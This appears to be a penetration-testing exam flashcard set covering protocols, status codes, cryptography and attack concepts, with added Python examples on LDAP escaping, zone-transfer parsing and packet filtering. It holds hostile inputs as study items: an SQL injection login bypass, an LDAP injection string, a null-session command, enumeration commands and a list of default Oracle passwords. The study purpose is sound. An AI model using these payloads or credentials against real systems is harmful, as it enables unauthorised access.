Canonical Name

TTL
Time to Live

CGI
Common Gateway Interface

STP
Spanning Tree Protocol

In a DNS zone transfer, what is requested?
Requests all data on a domain.

Telnet to a remote machine returns:
User Access Verification
Password:
Which o/s?
Cisco IOS

DES
Data Encryption Standard

DES. Key size?
56 bits

HTTP OSI Model layer?
Layer 7: Application

HTTP Code. Temporarily moved?
302

SQL server resolution service introduced?
SQL server 2000

SQL server stored procedures.
xp_cmdshell

ICMP type 8 (echo request) sent to a host without a firewall. Response?
ICMP type 0, Echo Reply

SYS user password (oracle)
CHANGE_ON_INSTALL

How can the HTTP TRACE method be used against a web server?
Cross-site tracing (XST): TRACE reflects the full request, so the user's cookies and session information can be compromised

Java technique that minimises threat from applets
Sandbox

Enumerate users with an empty GECOS field.
finger 0@host

LANMAN and NTLM.
Don’t use a salt.

Stored procedure xp_cmdshell can?
Execute operating-system commands (via cmd.exe) with the privileges of the SQL Server service account.

Unmap unused ISAPI filters and extensions to...?
...reduce the attack surface of IIS

Which SQL string can be used in the username field to bypass an authentication mechanism?
' or 1=1 --

Different web site host names share the same IP. How does the web server differentiate?
By inspecting the Host header in the client request.

HTTP Method for enumerating HTTP methods.
OPTIONS

EXPN command protocol?
SMTP

DNS Zone transfer command.
dig @relay.example.org example.org axfr

SMTP commands to enumerate users on a default Sendmail server.
VRFY, EXPN, RCPT TO

CVE-2003-0780 MySQL version has post authentication privilege escalation issue.
MySQL 4.0.15

DES Data block size
64 bits

RC4 key size
Variable, 40 to 2048 bits; 128 bits is the size commonly quoted (WEP used 40- or 104-bit RC4 keys)

Symmetric encryption algorithm.
AES

Trusted hosts and usernames for unix r-services
/etc/hosts.equiv

Cookie attribute that makes a cookie persistent (stored on disk rather than discarded when the browser closes)
Expires (or Max-Age)

Null session to Windows.
net use \\host\ipc$ "" /u:""

Reason for written permission before a pen test.
Computer Misuse Act 1990: without authorisation the testing itself is an offence.

CVE-2002-0906 buffer overflow, sendmail version.
8.12.4

Which ruser command lists active user details.
rusers -l

Password hashes stored on linux
/etc/shadow

HTTP methods (beyond GET, HEAD and POST)
OPTIONS, DELETE, PUT, TRACE

SAM file location
%systemroot%\system32\config\SAM

IIS 5.0. Which o/s?
Windows 2000

IPv6 bits?
128

How are cookies presented back to the server?
Cookie HTTP header.

SOAP
Simple Object Access Protocol

HTTP method for soap api data transfer?
POST

Windows permissions

Windows tracert packets?
ICMP

Which command enumerates exchange server connected by Telnet.
EHLO

SSH version susceptible to man in the middle attacks.
Version 1

TTL = 128. Which o/s?
Windows

Public Key Encryption
RSA

ICMP destination unreachable (type number?)
Type 3 (code 1 is "host unreachable")

Windows command to list all patches
wmic qfe

TNS listener default config.
Before Oracle 10g it could be remotely managed.

LDAP command injection characters.
()&*|
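
The following is an added example, not part of the original card set, showing why those characters matter. It builds an LDAP bind filter from user input first unsafely and then with the RFC 4515 escaping that neutralises them; the filter template and the uid/userPassword attribute names are assumptions.

```python
# Added example (not from the original page): LDAP filter injection and RFC 4515 escaping.
# The filter template and attribute names (uid, userPassword) are assumptions.

# RFC 4515 requires these characters to be escaped inside an assertion value.
_LDAP_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}

def escape_ldap_value(value):
    """Escape a string so it can only ever be matched as a literal value, never as filter syntax."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)

def build_filter_vulnerable(username, password):
    """DON'T: user input spliced straight into the filter."""
    return f"(&(uid={username})(userPassword={password}))"

def build_filter_safe(username, password):
    """Same filter with every user-supplied value escaped."""
    return f"(&(uid={escape_ldap_value(username)})(userPassword={escape_ldap_value(password)}))"

def top_level_filters(filter_str):
    """Split a filter string into its top-level parenthesised groups.
    A well-formed filter has exactly one; injection typically produces a second,
    trailing group that lenient servers ignore after the first has matched."""
    groups, depth, start = [], 0, 0
    for i, ch in enumerate(filter_str):
        if ch == "(":
            if depth == 0:
                start = i
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                groups.append(filter_str[start:i + 1])
    return groups

# Constructed attacker input: closes the uid assertion, adds a wildcard match for everyone,
# and pushes the password check into a separate filter the server never evaluates.
INJECTED_USERNAME = "*)(uid=*))(|(uid=*"
```

With the injected username the vulnerable filter becomes `(&(uid=*)(uid=*))(|(uid=*)(userPassword=x))`, whose first group matches every entry; the escaped version stays a single filter that searches for a literal uid containing the odd characters and matches nothing.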

RSA
Rivest, Shamir, & Adleman

Self signed SSL. Certificate vulnerability
Spoof certificate and execute man in the middle attack

Cookie attribute that prevents a cookie being accessed by client-side scripts (document.cookie)?
HttpOnly

CVE-2001-0414 NTP remote exploit version?
4.0.99k

AD database filename
NTDS.DIT

IPv4 bits?
32 bits

Prevent user enumeration through null sessions. Which registry value?
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous

IKE Main mode more secure than aggressive. Because?
identity protection.

DNS reverse lookup (PTR) record for IP 192.168.1.10
10.1.168.192.in-addr.arpa. IN PTR alpha.example.com.

BIND version information. Command?
dig @beta.example.com version.bind chaos txt

xhost -
Re-enables X server access control: only hosts in the access list may connect (xhost + disables access control and lets any host connect).

NOT a SIP method.
Quit.

FTP command to initiate data transfer
PORT

MAC address size.
48 Bits

802.3
Ethernet

DBSNMP default password?
DBSNMP

CVE 2012-5615 MySQL 5.6.0 vulnerability.?
Username enumeration.

NOT an ICMP message
Bad Length

PHP version chunk_split()function overflow

HTTP status code bad request?
400

TFTP command to list directory.
You cannot list directory.

ARP
Address Resolution Protocol

VTP
VLAN Trunking Protocol

CDP
Cisco Discovery Protocol

TACACS
Terminal Access Controller Access Control System

100
Continue

101
Switching Protocols

102
Processing

Internet Protocol Security (IPsec)
a secure network protocol suite that authenticates and encrypts the packets of data sent over an Internet Protocol network

Internet Protocol Security (IPsec)
used in virtual private networks (VPNs)

number of possible TCP ports
65536 (16-bit field, 0 to 65535); port 0 is reserved, leaving 65535 usable ports

number of possible UDP ports
65536 (16-bit field, 0 to 65535); port 0 is reserved, leaving 65535 usable ports

RFC1918 24-bit block
10.0.0.0/8

RFC1918 20-bit block
172.16.0.0/12

RFC1918 16-bit block
192.168.0.0/16

Common Vulnerabilities and Exposures (CVE)
provides a reference-method for publicly known information-security vulnerabilities and exposures

Common Vulnerability Scoring System (CVSS)
an open industry standard for assessing the severity of computer system security vulnerabilities

DREAD
a risk-rating model for security threats that scores Damage potential, Reproducibility, Exploitability, Affected users and Discoverability

Common Weakness Enumeration (CWE)
a category system for software weaknesses and vulnerabilities

National Vulnerability Database (NVD)
the U.S. government repository of standards-based vulnerability management data represented using the Security Content Automation Protocol (SCAP)

500
Internal Server Error

501
Not Implemented

502
Bad Gateway

503
Service Unavailable

504
Gateway Timeout

505
HTTP Version Not Supported

511
Network Authentication Required

CHANGE_ON_INSTALL
SYS

MANAGER
SYSTEM

TIGER
SCOTT

WOOD
ADAMS

STEEL
JONES

CLOTH
CLARK

PAPER
BLAKE

TRACE
TRACESVR

MANAGER
OLAPSYS

CHANGE_ON_INSTALL
XDB

400
Bad Request

401
Unauthorized

402
Payment Required

403
Forbidden

404
Not Found

405
Method Not Allowed

406
Not Acceptable

407
Proxy Authentication Required

408
Request Timeout

409
Conflict

410
Gone

411
Length Required

413
Payload Too Large

426
Upgrade Required

429
Too Many Requests

threat
a source of potential disruption, which has the potential to cause a risk

risk
the combination of consequences of a threat occurring and the likelihood of it doing so

inherent risk
the risk that an event will occur which may negatively affect the achievement of organisation’s objectives, assuming there are no controls in place

residual risk
the risk which remains after taking controls in to account

Session Initiation Protocol (SIP)
a signaling protocol used for initiating, maintaining, and terminating real-time sessions that include voice, video and messaging applications

SIP requests
REGISTER; INVITE; ACK; BYE; CANCEL; UPDATE; REFER; PRACK; SUBSCRIBE; NOTIFY; PUBLISH; MESSAGE; INFO; OPTIONS

IPsec security architecture
Authentication Headers (AH)
Encapsulating Security Payloads (ESP)
Security Associations (SA) – Internet Security Association and Key Management Protocol (ISAKMP); Internet Key Exchange (IKE and IKEv2)

LM
all passwords are converted into uppercase before generating the hash value

LM
password length is limited to maximum of 14 characters

LM
a 14-character password is broken into 7+7 characters and the hash is calculated for the two halves separately

LM
if the password is 7 characters or less, then the second half of hash will always produce same constant value (AAD3B435B51404EE)

LM
the hash value is sent to network servers without salting

LM
uses DES

128 bits
LAN Manager (LM) hash size:

Net-NTLM
used for network authentication

Net-NTLM
get these hashes when using tools like Responder or Inveigh

Net-NTLMv1
uses DES

Net-NTLMv2
uses HMAC-MD5

128 bits
Network New Technology LAN Manager (Net-NTLM) hash size (the Net-NTLMv2 NTProofStr is a 128-bit HMAC-MD5 followed by the variable-length client blob; the older Net-NTLMv1 response is 24 bytes):

NTLM
get these hashes when dumping the SAM database of any Windows OS, a Domain Controller’s Ntds.dit database or from Mimikatz

NTLM
uses MD4

128 bits
New Technology LAN Manager (NTLM) hash size:

NTLM
You CAN perform Pass-The-Hash attacks with these hashes

Net-NTLM
You CANNOT perform Pass-The-Hash attacks with these hashes

nbtstat; nbtscan
NetBIOS scanning tools:

nbtstat
a command-line utility built into Windows that reveals NetBIOS names and the name table of the remote (or local) machine, but for only one host at a time

nbtscan
a NetBIOS nameserver scanner which has the same functions as nbtstat but it operates on a range of addresses instead of one

PEAP
a protocol that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel

LEAP
a proprietary wireless LAN authentication method developed by Cisco Systems

LEAP
uses dynamic WEP keys with MS-CHAP authentication; the challenge/response can be captured and cracked offline with a dictionary attack (e.g. asleap)

stream cipher (symmetric)
Rivest Cipher 4 (RC4)

symmetric-key block cipher
Rivest Cipher 5 (RC5)

symmetric-key block cipher
Data Encryption Standard (DES)

symmetric-key block cipher
Advanced Encryption Standard (AES)

Media Access Control (MAC) address
of a device is a unique identifier assigned to a network interface controller (NIC)

48 bits
Media Access Control (MAC) address size:

Oracle System ID (SID)
used to uniquely identify a particular database on a system

rlogin; rcp; rsh
Berkeley r-commands that share the hosts.equiv and .rhosts access-control scheme

permissions required for copying a file into / out of a directory
source directory: execute and read permission
source file: read permission
target directory: execute and write permission
target file: no permission is needed if it does not yet exist (it is created by the copy), otherwise write permission on the existing file

blind SQL injection
a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response – this attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection

Link-Local Multicast Name Resolution (LLMNR)
a Microsoft Windows protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link

Network Basic Input/Output System (NetBIOS) name service
identifies systems on a local network by their NetBIOS name

LLMNR spoofing
Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system.

FTP bounce attack
an exploit of the FTP protocol whereby an attacker is able to use the PORT command to request access to ports indirectly through the use of the victim machine as a middle man for the request

Ntds.dit file
a database that stores Active Directory data, including information about user objects, groups, and group membership – it includes the password hashes for all users in the domain

computer worm
What is Code Red?

Internet Information Services (IIS) 5.0
MS01-033 basis

Code Red
The MS01-033 vulnerability was used by which malware?

computer worm
What is Conficker?

Conficker
The MS08-067 vulnerability was used by which malware?

computer worm
What is Blaster?

Distributed Component Object Model (DCOM)
MS03-026 basis

Blaster
The MS03-026 vulnerability was used by which malware?

computer worm
What is Nimda?

Local Security Authority Subsystem Service (LSASS)
MS04-011 basis

Internet Explorer
MS10-002 basis

Aurora
MS10-002 name

KiTrap0D
MS10-015 name

Print Spooler Service
MS10-061 basis

OK
200

Created
201

Accepted
202

Non-Authoritative Information
203

No Content
204

Reset Content
205

300
Multiple Choices

301
Moved Permanently

302
Found

307
Temporary Redirect

308
Permanent Redirect

0
Echo Reply

3
Destination Unreachable

4
Source Quench

5
Redirect Message

8
Echo Request

9
Router Advertisement

10
Router Solicitation

11
Time Exceeded

30
Traceroute

42
Extended Echo Request

43
Extended Echo Reply

Address Resolution Protocol (ARP)
a communication protocol used for discovering the link layer address, such as a MAC address, associated with a given Internet layer address, typically an IPv4 address

Dynamic Host Configuration Protocol (DHCP)
a network management protocol used on UDP/IP networks whereby a DHCP server dynamically assigns an IP address and other network configuration parameters to each device on a network so they can communicate with other IP networks

Hot Standby Router Protocol (HSRP)
a Cisco proprietary redundancy protocol for establishing a fault-tolerant default gateway

Virtual Router Redundancy Protocol (VRRP)
a computer networking protocol that provides for automatic assignment of available Internet Protocol (IP) routers to participating hosts

VLAN Trunking Protocol (VTP)
a Cisco proprietary protocol that propagates the definition of Virtual Local Area Networks (VLAN) on the whole local area network

Spanning Tree Protocol (STP)
a network protocol that builds a loop-free logical topology for Ethernet networks

Terminal Access Controller Access-Control System Plus (TACACS+)
a protocol developed by Cisco that handles authentication, authorisation, and accounting (AAA) services

Voice over Internet Protocol (VoIP)
a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet

Session Initiation Protocol (SIP)
a signaling protocol used for initiating, maintaining, and terminating real-time sessions that include voice, video and messaging applications

IEEE 802.11
part of the IEEE 802 set of LAN protocols, and specifies the set of media access control (MAC) and physical layer protocols for implementing wireless local area network (WLAN) Wi-Fi computer communication in various frequencies, including but not limited to the 2.4, 5, and 60 GHz frequency bands

Kismet
passive scanner on Linux

Wired Equivalent Privacy (WEP)
both WEP-40 and WEP-104 were deprecated in 2004

Temporal Key Integrity Protocol (TKIP)
deprecated in 2012

Wi-Fi Protected Access / Wi-Fi Protected Access II (WPA/WPA2)
defined in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP)

Extensible Authentication Protocol (EAP)
an authentication framework frequently used in wireless networks and point-to-point connections

Lightweight Extensible Authentication Protocol (LEAP)
a proprietary wireless LAN authentication method developed by Cisco

Protected Extensible Authentication Protocol (PEAP)
a protocol that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel

Teletype Network (Telnet)
a protocol used on the Internet or local area network to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection

Teletype Network (Telnet)
does not encrypt any traffic sent over the connection by default

Hypertext Transfer Protocol (HTTP)
an application protocol for distributed, collaborative, hypermedia information systems

Hypertext Transfer Protocol (HTTP)
does not encrypt any traffic sent over the connection

Hypertext Transfer Protocol Secure (HTTPS)
used for secure communication over a computer network, and widely used on the Internet

File Transfer Protocol (FTP)
a standard network protocol used for the transfer of computer files between a client and server on a computer network

File Transfer Protocol (FTP)
does not encrypt any traffic sent over the connection

Secure Shell (SSH)
a cryptographic network protocol for operating network services securely over an unsecured network

Simple Network Management Protocol (SNMP)
an Internet Standard protocol for collecting and organising information about managed devices on IP networks and for modifying that information to change device behaviour

using SNMP to attack a network
the SNMP implementation in certain Cisco IOS 11.x and 12.x releases is vulnerable to denial-of-service attacks

SNMP authentication
SNMP v1 (and v2c) send the community string, which is the only authentication, in clear text over the network

SNMP autodiscovery
in SNMP v1 and v2c the community string is broadcast in clear-text to other devices

Trivial File Transfer Protocol (TFTP)
a simple lockstep File Transfer Protocol which allows a client to get a file from or put a file onto a remote host

Trivial File Transfer Protocol (TFTP)
includes no login or access control mechanisms

Cisco Reverse Telnet
allows you to telnet to a device then from that device connect to the console of another device

Network Time Protocol (NTP)
a networking protocol for clock synchronisation between computer systems over packet-switched, variable-latency data networks

NTP message spoofing
used to move clocks on client computers

Network Time Protocol (NTP)
used in distributed denial of service (DDoS) attacks

SNMP, RMON, NetFlow
router-based techniques for local network traffic analysis

.pcap files
packet capture files in the libpcap format written by tcpdump, Wireshark and similar sniffers; they contain the raw packets captured from a network

network socket
an internal endpoint for sending or receiving data within a node on a computer network

netstat, ss
command line tools are used to list established sockets and related information

C:\windows\system32\config\SAM
password hashes (Windows):

/etc/shadow
password hashes (Unix):

domain information, registrant contact, administrative contact, technical contact
information contained within IP and domain registries (WHOIS)

DNS zone transfer
one of many mechanisms available for administrators to replicate DNS databases across a set of DNS servers

zone
the portion of the database that is replicated

Start Of [a zone of] Authority (SOA)
specifies authoritative information about a DNS zone

Mail eXchange (MX)
domain to mail server

Text (TXT)
more often carries machine-readable data, opportunistic encryption, etc.

Address (A)
domain to IP

Name Server (NS)
domain to a set of name servers

Pointer (PTR)
IP to a domain

HINFO
intended to provide information about host CPU type and operating system

Canonical Name (CNAME)
subdomain to a domain’s A record
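
The record-type cards above are what a tester reads out of a successful zone transfer. As an added example, not part of the original page, the code below parses a constructed `dig ... axfr` style listing (RFC 5737 addresses), follows CNAME chains, derives the in-addr.arpa names the A records imply, and pulls out the record types (HINFO, TXT) that leak extra information. The zone contents are made up for the example.

```python
import ipaddress
import shlex

# Constructed sample of what `dig @ns1.example.com example.com axfr` prints when the
# name server allows zone transfers. Addresses are from the RFC 5737 TEST-NET-1 range.
ZONE_TRANSFER = """\
example.com.        3600  IN  SOA   ns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600
example.com.        3600  IN  NS    ns1.example.com.
example.com.        3600  IN  NS    ns2.example.com.
example.com.        3600  IN  MX    10 mail.example.com.
example.com.        3600  IN  TXT   "v=spf1 mx -all"
ns1.example.com.    3600  IN  A     192.0.2.1
ns2.example.com.    3600  IN  A     192.0.2.2
mail.example.com.   3600  IN  A     192.0.2.25
www.example.com.    3600  IN  CNAME web01.example.com.
web01.example.com.  3600  IN  A     192.0.2.80
web01.example.com.  3600  IN  HINFO "INTEL-386" "UNIX"
"""

def parse_zone(text):
    """Parse zone-file style lines into dicts: name, ttl, class, type, rdata (list of tokens)."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        tokens = shlex.split(line)          # keeps quoted TXT / HINFO strings as single tokens
        name, ttl, klass, rtype, *rdata = tokens
        records.append({"name": name, "ttl": int(ttl), "class": klass, "type": rtype, "rdata": rdata})
    return records

def a_records(records):
    """Host name -> IPv4 address for every A record (the host list a tester wants)."""
    return {r["name"]: r["rdata"][0] for r in records if r["type"] == "A"}

def resolve(records, name, depth=0):
    """Follow CNAME chains until an A record is found; None if the name does not resolve."""
    if depth > 8:                            # guard against CNAME loops
        return None
    for r in records:
        if r["name"] != name:
            continue
        if r["type"] == "A":
            return r["rdata"][0]
        if r["type"] == "CNAME":
            return resolve(records, r["rdata"][0], depth + 1)
    return None

def expected_ptr_names(records):
    """Reverse-zone owner names implied by the A records, e.g. 25.2.0.192.in-addr.arpa -> mail.example.com."""
    return {ipaddress.ip_address(ip).reverse_pointer: name for name, ip in a_records(records).items()}

def mail_servers(records):
    """(preference, host) pairs from MX records, most preferred first."""
    return sorted((int(r["rdata"][0]), r["rdata"][1]) for r in records if r["type"] == "MX")

def info_leaks(records):
    """Records that hand a tester extra detail: HINFO (CPU/OS) and TXT (SPF, verification strings)."""
    return [r for r in records if r["type"] in ("HINFO", "TXT")]
```

The same parser works on output from a real `dig axfr` once the comment lines beginning with `;` are present, which is why it skips them. Comparing `expected_ptr_names()` with an actual reverse zone is a quick way to spot hosts that exist in one but not the other.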

Usenet newsgroup
a repository usually within the Usenet system, for messages posted from many users in different locations using Internet

-rwxr-xr-x
a regular file whose user class has full permissions and whose group and others classes have only the read and execute permissions

0740
-rwxr-----
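
The two permission cards (the `0740` / `-rwxr-----` pair and the copy rule a few cards earlier) are easier to apply with code. The following is an added example, not from the original page: it converts between octal and `ls -l` notation with the standard library and evaluates the copy rule (source directory r+x, source file r, target directory w+x, target file w only if it already exists) for a given permission class.

```python
import stat

R, W, X = 4, 2, 1

def octal_to_symbolic(mode, is_dir=False):
    """0o740 -> '-rwxr-----' exactly as ls -l prints it."""
    return stat.filemode((stat.S_IFDIR if is_dir else stat.S_IFREG) | mode)

def symbolic_to_octal(sym):
    """'-rwxr-----' -> 0o740. Only the nine rwx bits are returned; a lower-case s/t means
    the underlying x bit is set, an upper-case S/T means it is not."""
    bits = sym[1:10]
    if len(bits) != 9:
        raise ValueError("expected a 10-character ls -l permission string")
    mode = 0
    for ch in bits:
        mode = (mode << 1) | (1 if ch in "rwxst" else 0)
    return mode

def class_bits(mode, cls):
    """The rwx triplet that applies to 'user', 'group' or 'other'."""
    shift = {"user": 6, "group": 3, "other": 0}[cls]
    return (mode >> shift) & 0o7

def can_copy(src_dir, src_file, dst_dir, cls, dst_file=None):
    """Evaluate the copy rule for permission class `cls`.
    Returns (allowed, problems) where problems names every missing permission."""
    problems = []
    if class_bits(src_dir, cls) & (R | X) != (R | X):
        problems.append("source directory needs read and execute")
    if not class_bits(src_file, cls) & R:
        problems.append("source file needs read")
    if class_bits(dst_dir, cls) & (W | X) != (W | X):
        problems.append("target directory needs write and execute")
    if dst_file is not None and not class_bits(dst_file, cls) & W:
        problems.append("existing target file needs write")
    return (not problems, problems)
```

A useful check during a review: a world-writable directory such as /tmp (`0o1777`) lets any class create a new file there, but a `0o640` source file still cannot be copied out by "other" because the read bit is missing on the file itself, regardless of the directory.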

archive, hidden, system, read-only
traditionally, in Microsoft Windows, files and folders accepted four attributes:

filesystem Access Control List (ACL)
a data structure (usually a table) containing entries that specify individual user or group rights to specific system objects such as programmes, processes, or files

encryption
transforms data into another format in such a way that only specific individual(s) can reverse the transformation

encoding
transforms data into another format using a scheme that is publicly available so that it can easily be reversed

symmetric encryption
uses the same cryptographic keys for both encryption of plaintext and decryption of ciphertext

asymmetric encryption
uses pairs of keys: public keys which may be disseminated widely, and private keys which are known only to the owner

symmetric-key block cipher
DES – Data Encryption Standard

64 bits
DES block sizes:

56 bits
DES key sizes:

symmetric-key block cipher
3DES – Triple Data Encryption Standard

64 bits
3DES block sizes:

168, 112, or 56 bits
3DES key sizes:

symmetric-key block cipher
AES – Advanced Encryption Standard

128 bits
AES block sizes:

128, 192, or 256 bits
AES key sizes:

public-key cryptosystem
RSA – Rivest-Shamir-Adleman

1024 to 4096 bits
RSA key sizes (2048 bits is the usual minimum today; 1024-bit keys are considered weak):

Secure Hash Algorithm 1 (SHA1)
cryptographic hash function which takes an input and produces a 160-bit hash value known as a message digest – typically rendered as a hexadecimal number, 40 digits long

512 bits
SHA1 block sizes:

Message-Digest algorithm (MD5)
hash function producing a 128-bit hash value

512 bits
MD5 block sizes:

message integrity codes
a short piece of information used to authenticate a message – in other words, to confirm that the message came from the stated sender (its authenticity) and has not been changed

Hash-based Message Authentication Code (HMAC)
a specific type of Message Authentication Code (MAC) involving a cryptographic hash function and a secret cryptographic key

firewall
a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules

firewall
often categorised as either network firewalls or host-based firewalls

network access control list
a network filter utilised by routers and some switches to permit and restrict data flows into and out of network interfaces

router
a networking device that forwards data packets between computer networks

switch
a computer networking device that connects devices on a computer network by using packet switching to receive, process, and forward data to the destination device

Secure Sockets Layer (SSL)
a set of cryptographic protocols designed to provide communications security over a computer network; all SSL versions are now deprecated and have been superseded by TLS

Internet Protocol Security (IPsec)
a secure network protocol suite that authenticates and encrypts the packets of data sent over an Internet protocol network which is used in Virtual Private Networks (VPNs)

Secure Shell (SSH)
a cryptographic network protocol for operating network services securely over an unsecured network

Secure Shell (SSH)
typical applications include remote command-line login and remote command execution, but any network service can be secured with SSH

Pretty Good Privacy (PGP)
an encryption programme that provides cryptographic privacy and authentication for data communication

Pretty Good Privacy (PGP)
used for signing, encrypting, and decrypting texts, emails, files, directories, and whole disk partitions and to increase the security of email communications

Wired Equivalent Privacy (WEP)
standard 64-bit WEP uses a 40 bit key (also known as WEP-40), which is concatenated with a 24-bit initialisation vector (IV) to form the RC4 key

Temporal Key Integrity Protocol (TKIP)
designed as an interim solution to replace WEP without requiring the replacement of legacy hardware

Wi-Fi Protected Access (WPA)
defined in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP)

egress filtering
the practice of monitoring and potentially restricting the flow of information outbound from one network to another

egress filtering
TCP/IP packets that are being sent out of the internal network are examined via a router, firewall, or similar edge device

ingress filtering
a technique used to ensure that incoming packets are actually from the networks from which they claim to originate
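
As an added example (not part of the original card set), the code below turns the egress and ingress definitions above into a small edge policy: inbound packets are dropped when their source is a bogon (including the RFC 1918 blocks listed earlier) or spoofs the organisation's own prefix, and outbound packets must come from that prefix and go to an allow-listed port. The prefix (RFC 5737 TEST-NET-3), the port list and the sample packets are constructed assumptions.

```python
import ipaddress

# Assumed public prefix of the organisation (RFC 5737 documentation range).
OUR_PREFIXES = [ipaddress.ip_network("203.0.113.0/24")]

# Source addresses that can never legitimately arrive on the Internet-facing interface.
BOGON_SOURCES = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918 private blocks
    "0.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",      # this-network, loopback, link-local
    "224.0.0.0/4",                                     # multicast is never a valid source
)]

# Destination ports the organisation permits outbound (assumed policy).
EGRESS_PORTS = {53, 80, 443}

def _in_any(addr, networks):
    return any(addr in n for n in networks)

def ingress_allowed(src):
    """Inbound edge check: reject bogon sources and packets claiming our own prefix as source."""
    s = ipaddress.ip_address(src)
    if _in_any(s, BOGON_SOURCES):
        return False
    if _in_any(s, OUR_PREFIXES):      # our addresses never legitimately arrive from outside
        return False
    return True

def egress_allowed(src, dport):
    """Outbound edge check: source must be ours (BCP 38 anti-spoofing) and the port allow-listed."""
    s = ipaddress.ip_address(src)
    return _in_any(s, OUR_PREFIXES) and dport in EGRESS_PORTS

# Constructed packets: (direction, src, dst, dport)
SAMPLE_PACKETS = [
    ("in",  "198.51.100.7",  "203.0.113.10", 443),   # ordinary Internet client
    ("in",  "10.1.2.3",      "203.0.113.10", 22),    # RFC 1918 source from outside: spoofed
    ("in",  "203.0.113.9",   "203.0.113.10", 445),   # our own prefix arriving from outside: spoofed
    ("out", "203.0.113.10",  "198.51.100.7", 443),   # normal web traffic
    ("out", "203.0.113.10",  "198.51.100.7", 6667),  # IRC-style port, not on the allow-list
    ("out", "192.168.1.5",   "198.51.100.7", 80),    # internal address leaking out unNATed / spoofed
]

def apply_policy(packets):
    """Return a 'permit' or 'drop' verdict for each packet in order."""
    verdicts = []
    for direction, src, dst, dport in packets:
        ok = ingress_allowed(src) if direction == "in" else egress_allowed(src, dport)
        verdicts.append("permit" if ok else "drop")
    return verdicts
```

The point of the outbound check is the one the egress card makes: a compromised host trying to reach a command-and-control port, or a host spoofing a source address for a reflection attack, is stopped at the edge rather than relying on the remote network to filter it.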

banner grabbing
a technique used to gain information about a computer system on a network and the services running on its open ports

examples of ports used for banner grabbing
Hyper Text Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Simple Mail Transfer Protocol (SMTP); ports 80, 21, and 25 respectively

active fingerprinting
works by sending packets to a target and analysing the packets that are sent back

Nmap
almost all active fingerprinting is done with:

passive fingerprinting
sniffs TCP/IP ports, rather than generating network traffic by sending packets to them

application layer
7

presentation layer
6

session layer
5

transport layer
4

network layer
3

data link layer
2

physical layer
1

port scanner
an application to probe a server or host for open ports

Nmap
used to discover hosts and services on a computer network by sending packets and analysing the responses

-sS
TCP SYN (Stealth) Scan

-sT
TCP Connect Scan

-sU
UDP Scan

-sO
IP Protocol Scan

-p
selecting ports

-T0 through -T5
these timing templates affect many variables to adjust overall Nmap speed from very slow (-T0) to extremely aggressive (-T5)

--max-rtt-timeout
the maximum amount of time to wait for a port scan probe response

--max-retries
the maximum number of port scan probe retransmissions to a single port

--scan-delay
wait at least the given amount of time between sending probes to any individual host

-v
increase the verbosity level

-vv
further increase the verbosity level

-oA
output to all formats (.nmap, .xml, .gnmap)

-6
scan the target using the IPv6 protocol

network sniffer
computer programme or piece of computer hardware that can intercept and log traffic that passes over a digital network or part of a network

ping
measures the round-trip time for messages sent from the originating host to a destination computer that are echoed back to the source

ping
operates by sending Internet Control Message Protocol (ICMP) echo request packets to the target host and waiting for an ICMP echo reply

-s
specifies the number of data bytes to be sent

-c
stop after sending count ECHO_REQUEST packets

-w
specify a timeout, in seconds, before ping exits regardless of how many packets have been sent or received

-t
set the IP Time To Live (TTL)

-i
wait interval seconds between sending each packet

-R
record route

ping sweep
a method that can establish a range of IP addresses which map to live hosts

fping
a tool used for ping sweeps

Internet Protocol version 4 (IPv4)
uses 32-bit addresses (represented as four decimal octets, each 0 to 255, separated by full stops)

Internet Protocol version 6 (IPv6)
uses 128-bit addresses (represented as 8 groups of 4 hexadecimal digits with the groups being separated by colons)

Transmission Control Protocol (TCP)
provides reliable, ordered, and error-checked delivery of a stream of octets between applications running on hosts communicating via an IP network

User Datagram Protocol (UDP)
has no handshaking dialogues, and thus exposes the user’s programme to any unreliability of the underlying network; there is no guarantee of delivery, ordering, or duplicate protection

Internet Control Message Protocol (ICMP)
used by network devices, including routers, to send error messages and operational information

8 bits
1 byte

8 bits
1 octet

Category 5 cable (CAT 5)
a twisted pair cable for computer networks

Category 5 cable (CAT 5)
suitable for most varieties of Ethernet over twisted pair

fibre-optic communication
a method of transmitting information from one place to another by sending pulses of light through an optical fibre

10/100/1000baseT
standards of twisted-pair cables for the physical layer of an Ethernet computer network

Token Ring
a communications protocol for local area networks

Token Ring
uses a special three-byte frame called a ‘token’ that travels around a logical ‘ring’ of workstations or servers

wireless (802.11)
part of the IEEE 802 set of LAN protocols, and specifies the set of media access control (MAC) and physical layer protocols for implementing wireless local area network (WLAN) Wi-Fi computer communication in various frequencies, including but not limited to 2.4, 5, and 60 GHz frequency bands

shared media
nodes share a single communication medium (e.g. Ethernet); every message reaches every node

switched media
communication is point-to-point through dedicated lines

Virtual LAN (VLANs)
any broadcast domain that is partitioned and isolated in a computer network at the data link layer

Computer Misuse Act
CMA

Domain Name System
DNS

Electronic Code Book
ECB

